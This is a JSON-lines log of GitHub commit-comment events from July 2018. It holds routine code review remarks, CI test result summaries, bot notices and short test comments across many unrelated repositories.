{"id":"7954646617","type":"CommitCommentEvent","actor":{"login":"hipstersmoothie"},"repo":{"name":"erikbeng/jimp"},"payload":{"comment":{"id":29681702,"position":null,"line":null,"path":null,"commit_id":"432590d60ff195fb6b699b92ddcc1a5c3163ea26","created_at":"2018-07-12T08:15:02Z","updated_at":"2018-07-12T08:15:02Z","author_association":"NONE","body":"make that pr!"}},"created_at":"2018-07-12T08:15:02Z"}
{"id":"7954648130","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29681709,"position":null,"line":null,"path":null,"commit_id":"417a0bacb5889f80ef7a5e36df8d00d4298076fc","created_at":"2018-07-12T08:15:20Z","updated_at":"2018-07-12T08:15:20Z","author_association":"NONE","body":"issue_#6803 (mbadams5) - Win64-Windows-7-VisualStudio-14: Tests Failed (2096 of 2932 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nDataSetFixture Test Summary\n * Passed: 37\n * Failed: 2\n\nEnergyPlusFixture Test Summary\n * Passed: 448\n * Failed: 197\n\nInputProcessorFixture Test Summary\n * Passed: 40\n * Failed: 9\n\nintegration Test Summary\n * Passed: 6\n * Failed: 619\n\nSQLiteFixture Test Summary\n * Passed: 65\n * Failed: 3\n\nZoneUnitarySystemTest Test Summary\n * Passed: 3\n * Failed: 4\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-417a0bacb5889f80ef7a5e36df8d00d4298076fc-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-417a0bacb5889f80ef7a5e36df8d00d4298076fc-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-71.49%25-red.png)</a> \n"}},"created_at":"2018-07-12T08:15:20Z"}
{"id":"7954649745","type":"CommitCommentEvent","actor":{"login":"seb-buch"},"repo":{"name":"seb-buch/mdanalysis"},"payload":{"comment":{"id":29681714,"position":null,"line":null,"path":null,"commit_id":"6e0ceda1901e1d768ea1ed457370fb5ea1033ca2","created_at":"2018-07-12T08:15:38Z","updated_at":"2018-07-12T08:15:38Z","author_association":"OWNER","body":"Hi,\r\n\r\nFrom experience, Valgrind tends to have \"false\" positives when dealing with Cython extensions. I have seen leaks reported by Valgrind even though non of them was related the actual cython. You really have to check the reported leaks to see if they really come from your code. Still, it may possible that the extension is still leaking.\r\nAnyhow, I am working on some (drastic) improvements to enchance speed and avoid using malloc altogether. As soon as I am done I will test the updated version against your benchmarks (specially the \"augment_guessbonds\" one)... I hope that it will be faster than the solution you came with but it will be hard as you have done some pretty good work!\r\n"}},"created_at":"2018-07-12T08:15:38Z"}
{"id":"7954649844","type":"CommitCommentEvent","actor":{"login":"Programming-Skills"},"repo":{"name":"Programming-Skills/my_website"},"payload":{"comment":{"id":29681715,"position":null,"line":null,"path":null,"commit_id":"615c5f64d291aaee11f65df9a1a72b15258333c2","created_at":"2018-07-12T08:15:40Z","updated_at":"2018-07-12T08:15:40Z","author_association":"OWNER","body":"## Commit Comment\r\n\r\nLooking at how this commit was created."}},"created_at":"2018-07-12T08:15:40Z"}
{"id":"7954653252","type":"CommitCommentEvent","actor":{"login":"jaykrell"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":29681724,"position":5,"line":38,"path":"mcs/class/corlib/ReferenceSources/String.cs","commit_id":"262c5f40cb6b6fa70d51c7744a1b5a9d1023c77a","created_at":"2018-07-12T08:16:19Z","updated_at":"2018-07-12T08:16:19Z","author_association":"MEMBER","body":"Why isn't this System.UIntPtr?"}},"created_at":"2018-07-12T08:16:19Z"}
{"id":"7954657096","type":"CommitCommentEvent","actor":{"login":"ItsCocan"},"repo":{"name":"ItsCocan/Cans"},"payload":{"comment":{"id":29681730,"position":2,"line":2,"path":"README.md","commit_id":"89875652bfb254b012cdbd3a2c9eee753fe1be1b","created_at":"2018-07-12T08:17:05Z","updated_at":"2018-07-12T08:17:05Z","author_association":"OWNER","body":"111"}},"created_at":"2018-07-12T08:17:05Z"}
{"id":"7954657125","type":"CommitCommentEvent","actor":{"login":"decathorpe"},"repo":{"name":"elementary/calendar"},"payload":{"comment":{"id":29681731,"position":null,"line":null,"path":null,"commit_id":"d5dd07b7cf5034928922807ebada36aac6ec3f81","created_at":"2018-07-12T08:17:05Z","updated_at":"2018-07-12T08:17:05Z","author_association":"CONTRIBUTOR","body":"There's a small issue with the port:\r\nThe `.vapi` and `.deps` files have different names:\r\n\r\n\r\n```\r\n   /usr/share/vala/vapi/elementary-calendar.vapi\r\n   /usr/share/vala/vapi/io.elementary.calendar.deps\r\n```\r\n\r\nI guess both should be named `elementary-calendar` to match the library `.so` and header file names?"}},"created_at":"2018-07-12T08:17:05Z"}
{"id":"7954659899","type":"CommitCommentEvent","actor":{"login":"Eijebong"},"repo":{"name":"servo/core-foundation-rs"},"payload":{"comment":{"id":29681737,"position":null,"line":null,"path":null,"commit_id":"02e5955e76e111f1e0953afaa3e5b14d5d3f92c6","created_at":"2018-07-12T08:17:39Z","updated_at":"2018-07-12T08:17:39Z","author_association":"CONTRIBUTOR","body":"Could this be released ? :)"}},"created_at":"2018-07-12T08:17:39Z"}
{"id":"7954663672","type":"CommitCommentEvent","actor":{"login":"chawoohong"},"repo":{"name":"summer-sb/MureokMureok"},"payload":{"comment":{"id":29681752,"position":27,"line":57,"path":"app/src/main/java/com/example/totoroto/mureok/example/example2/ExampleActivity.kt","commit_id":"5cf694cfaf7b3ea65435a03295ffa72c7cf2e563","created_at":"2018-07-12T08:18:24Z","updated_at":"2018-07-12T08:18:24Z","author_association":"COLLABORATOR","body":"실제로 name이 1이거나 2이거나 3일 수 있으므로 이 방법 역시 적절하지 않습니다."}},"created_at":"2018-07-12T08:18:24Z"}
{"id":"7954663720","type":"CommitCommentEvent","actor":{"login":"mkangia"},"repo":{"name":"dimagi/commcare-hq"},"payload":{"comment":{"id":29681753,"position":12,"line":720,"path":"corehq/apps/locations/tests/test_bulk_management.py","commit_id":"8c2d3c168055b30bc73f8f622bbad2ce519be203","created_at":"2018-07-12T08:18:24Z","updated_at":"2018-07-12T08:18:24Z","author_association":"CONTRIBUTOR","body":"@esoergel \r\nSo this is only happening in tests since we don't \"delete\" domains for example, unless needed via a management command?\r\nFor tests,\r\nMay be we can just do `cache.clear()` as a part of each tear down? So removes any cached returns?"}},"created_at":"2018-07-12T08:18:24Z"}
{"id":"7954665196","type":"CommitCommentEvent","actor":{"login":"tuananh18"},"repo":{"name":"sadsfae/ansible-elk"},"payload":{"comment":{"id":29681755,"position":67,"line":26,"path":"install/roles/elk_client/tasks/main.yml","commit_id":"b9971acf65a3744a3caff640feb7c0f49e7eb28d","created_at":"2018-07-12T08:18:44Z","updated_at":"2018-07-12T08:18:44Z","author_association":"NONE","body":"q"}},"created_at":"2018-07-12T08:18:44Z"}
{"id":"7954665393","type":"CommitCommentEvent","actor":{"login":"HolyWu"},"repo":{"name":"HomeOfVapourSynthEvolution/havsfunc"},"payload":{"comment":{"id":29681756,"position":null,"line":null,"path":null,"commit_id":"d58d68134934dfc49153116c4edc1ab46e333877","created_at":"2018-07-12T08:18:46Z","updated_at":"2018-07-12T08:18:46Z","author_association":"MEMBER","body":"I intentionally want to dismiss the individual plugin since long time ago, as it kinda confuses the users and I don't want to maintain a plugin of duplicate functionality as well. If the `range` parameter does play an important role in filtering, then please go filing an issue on mvtools."}},"created_at":"2018-07-12T08:18:46Z"}
{"id":"7954668967","type":"CommitCommentEvent","actor":{"login":"dan-v"},"repo":{"name":"dan-v/rattlesnakeos-stack"},"payload":{"comment":{"id":29681762,"position":null,"line":null,"path":null,"commit_id":"eb1a621f6914fdfe108011d9d9ea8a4a175e5504","created_at":"2018-07-12T08:19:31Z","updated_at":"2018-07-12T08:19:31Z","author_association":"OWNER","body":"It appears to be an AOSP issue with only Pixel 2 where APN database is not included. On Pixel 2 XL it is included. If you have already done a build and haven't flashed yet, I would delete the factory image in your S3 release bucket before doing another build so that you get a new factory image on next build to flash. You can see more details about it here: https://www.reddit.com/r/RattlesnakeOS/comments/8y3v54/pixel_2_fix_testers_needed/"}},"created_at":"2018-07-12T08:19:31Z"}
{"id":"7954671939","type":"CommitCommentEvent","actor":{"login":"NickKaramoff"},"repo":{"name":"project-six/it-museum"},"payload":{"comment":{"id":29681768,"position":null,"line":null,"path":null,"commit_id":"5183e37e5f4daaf4e0f284bf88cdd5372c8e9af1","created_at":"2018-07-12T08:20:07Z","updated_at":"2018-07-12T08:20:07Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Разделить шаблоны HTML](https://trello.com/c/WfE50r5K/44-%D1%80%D0%B0%D0%B7%D0%B4%D0%B5%D0%BB%D0%B8%D1%82%D1%8C-%D1%88%D0%B0%D0%B1%D0%BB%D0%BE%D0%BD%D1%8B-html)"}},"created_at":"2018-07-12T08:20:07Z"}
{"id":"7954677665","type":"CommitCommentEvent","actor":{"login":"tvdijen"},"repo":{"name":"simplesamlphp/simplesamlphp"},"payload":{"comment":{"id":29681779,"position":null,"line":null,"path":null,"commit_id":"540f2c971460d7c91ee95ddfc98fdfbd31183125","created_at":"2018-07-12T08:21:16Z","updated_at":"2018-07-12T08:21:16Z","author_association":"MEMBER","body":"*slays his typist*"}},"created_at":"2018-07-12T08:21:16Z"}
{"id":"7954679363","type":"CommitCommentEvent","actor":{"login":"orivej"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29681782,"position":null,"line":null,"path":null,"commit_id":"f2f7c4287ff257e7c219737b0d7416a7965c0c3e","created_at":"2018-07-12T08:21:36Z","updated_at":"2018-07-12T08:21:36Z","author_association":"CONTRIBUTOR","body":"This commit is not in the range that broke darwin tqdm: https://hydra.nixos.org/build/74951441 Upstream has one similar bug report: https://github.com/tqdm/tqdm/issues/538"}},"created_at":"2018-07-12T08:21:36Z"}
{"id":"7954679905","type":"CommitCommentEvent","actor":{"login":"chawoohong"},"repo":{"name":"summer-sb/MureokMureok"},"payload":{"comment":{"id":29681785,"position":27,"line":57,"path":"app/src/main/java/com/example/totoroto/mureok/example/example2/ExampleActivity.kt","commit_id":"5cf694cfaf7b3ea65435a03295ffa72c7cf2e563","created_at":"2018-07-12T08:21:43Z","updated_at":"2018-07-12T08:21:43Z","author_association":"COLLABORATOR","body":"} 다음에 한칸 띄고 catch를 적는것이 보기 좋습니다. 마찬가지로 `(e: IllegalArgumentException)`다음에도 한칸 띄고 {를 쓰는것이 보기 좋습니다."}},"created_at":"2018-07-12T08:21:43Z"}
{"id":"7954682070","type":"CommitCommentEvent","actor":{"login":"chawoohong"},"repo":{"name":"summer-sb/MureokMureok"},"payload":{"comment":{"id":29681788,"position":60,"line":81,"path":"app/src/main/java/com/example/totoroto/mureok/example/example2/ExampleActivity.kt","commit_id":"5cf694cfaf7b3ea65435a03295ffa72c7cf2e563","created_at":"2018-07-12T08:22:09Z","updated_at":"2018-07-12T08:22:09Z","author_association":"COLLABORATOR","body":"if 다음에 한칸 띄고 조건문을 적는 것이 보기 좋습니다."}},"created_at":"2018-07-12T08:22:09Z"}
{"id":"7954683759","type":"CommitCommentEvent","actor":{"login":"chawoohong"},"repo":{"name":"summer-sb/MureokMureok"},"payload":{"comment":{"id":29681794,"position":62,"line":83,"path":"app/src/main/java/com/example/totoroto/mureok/example/example2/ExampleActivity.kt","commit_id":"5cf694cfaf7b3ea65435a03295ffa72c7cf2e563","created_at":"2018-07-12T08:22:29Z","updated_at":"2018-07-12T08:22:29Z","author_association":"COLLABORATOR","body":"여기서도 } 다음에 한칸 띄고 else를 적는것이 보기 좋습니다."}},"created_at":"2018-07-12T08:22:29Z"}
{"id":"7954683858","type":"CommitCommentEvent","actor":{"login":"alexbool"},"repo":{"name":"nrc/derive-new"},"payload":{"comment":{"id":29681795,"position":null,"line":null,"path":null,"commit_id":"301346f0424a20445a817f9c67891c420aa9e554","created_at":"2018-07-12T08:22:30Z","updated_at":"2018-07-12T08:22:30Z","author_association":"NONE","body":"Thanks!"}},"created_at":"2018-07-12T08:22:30Z"}
{"id":"7954688215","type":"CommitCommentEvent","actor":{"login":"loup99"},"repo":{"name":"loup99/WtWSMS"},"payload":{"comment":{"id":29681799,"position":null,"line":null,"path":null,"commit_id":"e2fb692af7f643151c4d1e5cc3664c089c0312a1","created_at":"2018-07-12T08:23:20Z","updated_at":"2018-07-12T08:23:20Z","author_association":"OWNER","body":"No problems."}},"created_at":"2018-07-12T08:23:20Z"}
{"id":"7954688256","type":"CommitCommentEvent","actor":{"login":"Tha14"},"repo":{"name":"NicklasVraa/nv-dark-ui"},"payload":{"comment":{"id":29681800,"position":null,"line":null,"path":null,"commit_id":"4bb0714aaeaf6656b0e8fcec5a6da5574f1640c0","created_at":"2018-07-12T08:23:21Z","updated_at":"2018-07-12T08:23:21Z","author_association":"NONE","body":"Hey, Is it possible to add an option for the visibility of the scrollbars? Thanks."}},"created_at":"2018-07-12T08:23:21Z"}
{"id":"7954688653","type":"CommitCommentEvent","actor":{"login":"bkm911118"},"repo":{"name":"bkm911118/bkm-test-deneme"},"payload":{"comment":{"id":29681801,"position":null,"line":null,"path":null,"commit_id":"eb6f86bf291c84a9add588ae592c0829f1405588","created_at":"2018-07-12T08:23:26Z","updated_at":"2018-07-12T08:23:26Z","author_association":"OWNER","body":"hacking hack bkmexpress bkm deneme sizinti"}},"created_at":"2018-07-12T08:23:26Z"}
{"id":"7954693516","type":"CommitCommentEvent","actor":{"login":"marek-safar"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":29681810,"position":5,"line":38,"path":"mcs/class/corlib/ReferenceSources/String.cs","commit_id":"262c5f40cb6b6fa70d51c7744a1b5a9d1023c77a","created_at":"2018-07-12T08:24:21Z","updated_at":"2018-07-12T08:24:21Z","author_association":"MEMBER","body":"Because SequenceEqual requires it"}},"created_at":"2018-07-12T08:24:21Z"}
{"id":"7954693809","type":"CommitCommentEvent","actor":{"login":"ryotsu1036"},"repo":{"name":"ryotsu1036/test"},"payload":{"comment":{"id":29681812,"position":null,"line":null,"path":null,"commit_id":"caa1d6b8160e18b107b16c8d802ed1e26cf8dfb1","created_at":"2018-07-12T08:24:25Z","updated_at":"2018-07-12T08:24:25Z","author_association":"OWNER","body":"Add about page."}},"created_at":"2018-07-12T08:24:25Z"}
{"id":"7954695002","type":"CommitCommentEvent","actor":{"login":"Wang-Yue"},"repo":{"name":"MusicPlayerDaemon/MPD"},"payload":{"comment":{"id":29681816,"position":167,"line":761,"path":"src/output/plugins/OSXOutputPlugin.cxx","commit_id":"e89c421313b53ed98b249cccb9aee3a0d0344a3d","created_at":"2018-07-12T08:24:38Z","updated_at":"2018-07-12T08:24:38Z","author_association":"CONTRIBUTOR","body":"I'd like to see all dop code guarded with if (dop) and #ifdef USE_DSD"}},"created_at":"2018-07-12T08:24:38Z"}
{"id":"7954717640","type":"CommitCommentEvent","actor":{"login":"lapido"},"repo":{"name":"lapido/AssetVerificationAPP"},"payload":{"comment":{"id":29681875,"position":null,"line":null,"path":null,"commit_id":"612e824d232ca5e9b10d02edd6d8f36fed2060dc","created_at":"2018-07-12T08:28:48Z","updated_at":"2018-07-12T08:28:48Z","author_association":"OWNER","body":"-"}},"created_at":"2018-07-12T08:28:48Z"}
{"id":"7954717904","type":"CommitCommentEvent","actor":{"login":"omelhus"},"repo":{"name":"palaah/tibber-smartthings-app"},"payload":{"comment":{"id":29681876,"position":5,"line":100,"path":"src/Device handlers/tibber-price-device-handler.groovy","commit_id":"f7608db930729c4f95959116a51fbe57fad95ef3","created_at":"2018-07-12T08:28:51Z","updated_at":"2018-07-12T08:28:51Z","author_association":"NONE","body":"Hey, I just wanted to let you know that your Tibber access token is public here."}},"created_at":"2018-07-12T08:28:51Z"}
{"id":"7954718682","type":"CommitCommentEvent","actor":{"login":"KarthiSiva4"},"repo":{"name":"KarthiSiva4/testing-wala"},"payload":{"comment":{"id":29681877,"position":null,"line":null,"path":null,"commit_id":"1c7cc0674bcad34dac1e19ea0bc3b581c41d32b0","created_at":"2018-07-12T08:28:59Z","updated_at":"2018-07-12T08:28:59Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-12T08:28:59Z"}
{"id":"7954724505","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29681895,"position":101,"line":63,"path":"contracts/Remittance.sol","commit_id":"f69b6002b1f9a8c0f24438f35653af1f070a0659","created_at":"2018-07-12T08:30:04Z","updated_at":"2018-07-12T08:30:04Z","author_association":"OWNER","body":"@xavierlepretre Sure Sir. understood. Can i fix it by taking transaction id off-chain ? as suggested in the comments earlier ? This way we can also take token number or token id from other authenticaiton systems like Vasco and others and hash it in our contract. In this case external entities will be responsible for ensuring the uniqueness. We can just check if the same seed / trnsaction id is in use or not through `require(transactions[puzzle].ethFunds == 0, \"[ER202] Invalid transaction\");`"}},"created_at":"2018-07-12T08:30:04Z"}
{"id":"7954737703","type":"CommitCommentEvent","actor":{"login":"kajal-alpha"},"repo":{"name":"OpenCodeFoundation/asset-manager"},"payload":{"comment":{"id":29681919,"position":4,"line":6,"path":"src/AssetManager.Infrastructure/Data/EfRepository.cs","commit_id":"2b5b6df98be1ad612ba2ec0c4fe99e995c4be382","created_at":"2018-07-12T08:32:25Z","updated_at":"2018-07-12T08:32:25Z","author_association":"MEMBER","body":"this is reference for AsEnumerable method."}},"created_at":"2018-07-12T08:32:25Z"}
{"id":"7954744059","type":"CommitCommentEvent","actor":{"login":"krkanbecej"},"repo":{"name":"krkanbecej/domaci-zadatak"},"payload":{"comment":{"id":29681927,"position":null,"line":null,"path":null,"commit_id":"ec330282dcf0901955de97863c473ec13124b25c","created_at":"2018-07-12T08:33:38Z","updated_at":"2018-07-12T08:33:38Z","author_association":"OWNER","body":"prva izmena sa windovsa"}},"created_at":"2018-07-12T08:33:38Z"}
{"id":"7954744332","type":"CommitCommentEvent","actor":{"login":"bensarthou"},"repo":{"name":"LElgueddari/pysap"},"payload":{"comment":{"id":29681928,"position":43,"line":78,"path":"pysap/plugins/mri/parallel_mri/extract_sensitivity_maps.py","commit_id":"a019ce3675b7e5da1eba07d8b7091584271d266d","created_at":"2018-07-12T08:33:41Z","updated_at":"2018-07-12T08:33:41Z","author_association":"NONE","body":"linespace does not exist, it is linspace\r\n\r\n"}},"created_at":"2018-07-12T08:33:41Z"}
{"id":"7954747910","type":"CommitCommentEvent","actor":{"login":"robertbaker"},"repo":{"name":"DefinitelyTyped/DefinitelyTyped"},"payload":{"comment":{"id":29681934,"position":null,"line":null,"path":null,"commit_id":"d488c0b1f51ae52a48e5eb3fd3bed9fa13dc9fea","created_at":"2018-07-12T08:34:21Z","updated_at":"2018-07-12T08:34:21Z","author_association":"CONTRIBUTOR","body":"It must have been removed in the latest releases, did you search the\nhistory?\n\nFeel free to maintain, I don't use that library anymore.\n\nOn Sun, Jul 8, 2018, 9:01 AM BehindTheMath <notifications@github.com> wrote:\n\n> @robertbaker <https://github.com/robertbaker> I can't find any\n> formatCurrency() function in the Numeral.js source code, and I'm getting\n> an error when I try using it. Can you point me to the source?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/DefinitelyTyped/DefinitelyTyped/commit/d488c0b1f51ae52a48e5eb3fd3bed9fa13dc9fea#commitcomment-29634029>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AA3YJXqe9oTTxsDBNRwB9Y8qi6C_KfsTks5uEizFgaJpZM4VGxqI>\n> .\n>\n"}},"created_at":"2018-07-12T08:34:21Z"}
{"id":"7954748080","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29681936,"position":123,"line":72,"path":"contracts/Remittance.sol","commit_id":"f69b6002b1f9a8c0f24438f35653af1f070a0659","created_at":"2018-07-12T08:34:23Z","updated_at":"2018-07-12T08:34:23Z","author_association":"OWNER","body":"@xavierlepretre I am a bit confuse here. I can remove this procedure and save password / OTP as is assuming it is factored off-chain. Or change this procedure to hash password / OTP and save it in our contract. Appreciate your help in this regards."}},"created_at":"2018-07-12T08:34:23Z"}
{"id":"7954750518","type":"CommitCommentEvent","actor":{"login":"bensarthou"},"repo":{"name":"LElgueddari/pysap"},"payload":{"comment":{"id":29681938,"position":45,"line":80,"path":"pysap/plugins/mri/parallel_mri/extract_sensitivity_maps.py","commit_id":"a019ce3675b7e5da1eba07d8b7091584271d266d","created_at":"2018-07-12T08:34:52Z","updated_at":"2018-07-12T08:34:52Z","author_association":"NONE","body":"meshgrid return a list but the griddata function after takes a tuple for the grid variable. Consider changing to \r\n\r\n``grid = tuple(np.meshgrid(*X))``"}},"created_at":"2018-07-12T08:34:52Z"}
{"id":"7954754726","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29681945,"position":null,"line":null,"path":null,"commit_id":"f69b6002b1f9a8c0f24438f35653af1f070a0659","created_at":"2018-07-12T08:35:39Z","updated_at":"2018-07-12T08:35:39Z","author_association":"OWNER","body":"@xavierlepretre Thank you again for your comments. In-order to save time, i'll incorporate all these changes an push new patch as soon as possible. Thanks again."}},"created_at":"2018-07-12T08:35:39Z"}
{"id":"7954770760","type":"CommitCommentEvent","actor":{"login":"ezio84"},"repo":{"name":"ezio84/device_huawei_berkeley"},"payload":{"comment":{"id":29681978,"position":null,"line":null,"path":null,"commit_id":"1882af102da792f1173c5bf599a82c859bc80b9e","created_at":"2018-07-12T08:38:36Z","updated_at":"2018-07-12T08:38:36Z","author_association":"OWNER","body":"Commit message :p"}},"created_at":"2018-07-12T08:38:36Z"}
{"id":"7954770953","type":"CommitCommentEvent","actor":{"login":"Ganthark"},"repo":{"name":"cipheLab/ciphold"},"payload":{"comment":{"id":29681979,"position":null,"line":null,"path":null,"commit_id":"691578218ac703cde0434eee2b7c00c86288484d","created_at":"2018-07-12T08:38:38Z","updated_at":"2018-07-12T08:38:38Z","author_association":"NONE","body":"test"}},"created_at":"2018-07-12T08:38:38Z"}
{"id":"7954773032","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29681982,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-12T08:39:03Z","updated_at":"2018-07-12T08:39:03Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T08:39:03Z"}
{"id":"7954775057","type":"CommitCommentEvent","actor":{"login":"Kamila0707"},"repo":{"name":"Kamila0707/Luxo.github.io"},"payload":{"comment":{"id":29681987,"position":338,"line":169,"path":"index.html","commit_id":"6cf864973777f593362fb5c0d16a2db726b4f189","created_at":"2018-07-12T08:39:26Z","updated_at":"2018-07-12T08:39:26Z","author_association":"OWNER","body":"</html>\r\n"}},"created_at":"2018-07-12T08:39:26Z"}
{"id":"7954779126","type":"CommitCommentEvent","actor":{"login":"nvcleemp"},"repo":{"name":"math1um/objects-invariants-properties"},"payload":{"comment":{"id":29681993,"position":null,"line":null,"path":null,"commit_id":"3e7ba2360136553c7bf20eba929fc6e3ef63dced","created_at":"2018-07-12T08:40:13Z","updated_at":"2018-07-12T08:40:13Z","author_association":"COLLABORATOR","body":"Yet again an example of why each method should have a doctest. :wink: "}},"created_at":"2018-07-12T08:40:13Z"}
{"id":"7954782107","type":"CommitCommentEvent","actor":{"login":"kevinrichard669"},"repo":{"name":"sebs/capcoin"},"payload":{"comment":{"id":29681997,"position":4,"line":17,"path":"package.json","commit_id":"0b62a2fadf89344ca0d0f226944080ca0619ca95","created_at":"2018-07-12T08:40:47Z","updated_at":"2018-07-12T08:40:47Z","author_association":"NONE","body":"BestDnT"}},"created_at":"2018-07-12T08:40:47Z"}
{"id":"7954786377","type":"CommitCommentEvent","actor":{"login":"jflute"},"repo":{"name":"dbflute-session/erflute"},"payload":{"comment":{"id":29682009,"position":3,"line":3,"path":"resources/mysql_characterset.properties","commit_id":"e459a70322376cf21420dbbb482f3cef2ff982a2","created_at":"2018-07-12T08:41:33Z","updated_at":"2018-07-12T08:41:33Z","author_association":"CONTRIBUTOR","body":"utf8_bin is mistake, fix at next commit"}},"created_at":"2018-07-12T08:41:33Z"}
{"id":"7954787624","type":"CommitCommentEvent","actor":{"login":"kevinrichard669"},"repo":{"name":"sebs/capcoin"},"payload":{"comment":{"id":29682015,"position":16,"line":55,"path":"package.json","commit_id":"0b62a2fadf89344ca0d0f226944080ca0619ca95","created_at":"2018-07-12T08:41:47Z","updated_at":"2018-07-12T08:41:47Z","author_association":"NONE","body":"Get hub"}},"created_at":"2018-07-12T08:41:47Z"}
{"id":"7954790704","type":"CommitCommentEvent","actor":{"login":"Cyruz143"},"repo":{"name":"Cyruz143/hull3"},"payload":{"comment":{"id":29682018,"position":null,"line":null,"path":null,"commit_id":"5973db0490863a9e3853f535f8aeb77065fab030","created_at":"2018-07-12T08:42:22Z","updated_at":"2018-07-12T08:42:22Z","author_association":"OWNER","body":"Looking at the load order, we might need to tweak it a bit so that `hull3_mission_timeOfDay` is defined when this code runs...\r\n\r\nhttps://github.com/Cyruz143/hull3/blob/master/hull3/hull3_preinit.sqf#L13-L25"}},"created_at":"2018-07-12T08:42:22Z"}
{"id":"7954791977","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/zold"},"payload":{"comment":{"id":29682021,"position":null,"line":null,"path":null,"commit_id":"3cd5cd12df2989c95aa02091d9f6aa5174aef5e2","created_at":"2018-07-12T08:42:36Z","updated_at":"2018-07-12T08:42:36Z","author_association":"COLLABORATOR","body":"Puzzle `292-3bcf6540` disappeared from [`lib/zold/commands/remote.rb`](https://github.com/zold-io/zold/blob/master/lib/zold/commands/remote.rb), that's why I closed #329. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-12T08:42:36Z"}
{"id":"7954792656","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/zold"},"payload":{"comment":{"id":29682022,"position":null,"line":null,"path":null,"commit_id":"3cd5cd12df2989c95aa02091d9f6aa5174aef5e2","created_at":"2018-07-12T08:42:44Z","updated_at":"2018-07-12T08:42:44Z","author_association":"COLLABORATOR","body":"Puzzle `329-08487f44` discovered in   [`test/commands/test_remote.rb`](  https://github.com/zold-io/zold/blob/master/test/commands/test_remote.rb)   and submitted as #388. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-12T08:42:44Z"}
{"id":"7954794678","type":"CommitCommentEvent","actor":{"login":"kevinrichard669"},"repo":{"name":"sebs/capcoin"},"payload":{"comment":{"id":29682023,"position":null,"line":null,"path":null,"commit_id":"0b62a2fadf89344ca0d0f226944080ca0619ca95","created_at":"2018-07-12T08:43:07Z","updated_at":"2018-07-12T08:43:07Z","author_association":"NONE","body":"Did it\r\n"}},"created_at":"2018-07-12T08:43:07Z"}
{"id":"7954796104","type":"CommitCommentEvent","actor":{"login":"marek-safar"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":29682027,"position":5,"line":38,"path":"mcs/class/corlib/ReferenceSources/String.cs","commit_id":"262c5f40cb6b6fa70d51c7744a1b5a9d1023c77a","created_at":"2018-07-12T08:43:22Z","updated_at":"2018-07-12T08:43:22Z","author_association":"MEMBER","body":"yes"}},"created_at":"2018-07-12T08:43:22Z"}
{"id":"7954811277","type":"CommitCommentEvent","actor":{"login":"Rashed97"},"repo":{"name":"ezio84/device_huawei_berkeley"},"payload":{"comment":{"id":29682052,"position":null,"line":null,"path":null,"commit_id":"1882af102da792f1173c5bf599a82c859bc80b9e","created_at":"2018-07-12T08:46:04Z","updated_at":"2018-07-12T08:46:04Z","author_association":"NONE","body":"Hm. I'm not finding them on /system on L04"}},"created_at":"2018-07-12T08:46:04Z"}
{"id":"7954823167","type":"CommitCommentEvent","actor":{"login":"sukhyun99"},"repo":{"name":"sukhyun99/bitcamp"},"payload":{"comment":{"id":29682066,"position":11,"line":11,"path":"WorkSpace4/JS0703_jquery/WebContent/jq02.html","commit_id":"b877a6e7578df3e801903f166b2d13b5c516abb4","created_at":"2018-07-12T08:48:19Z","updated_at":"2018-07-12T08:48:19Z","author_association":"OWNER","body":"sdlknsldf\r\n"}},"created_at":"2018-07-12T08:48:19Z"}
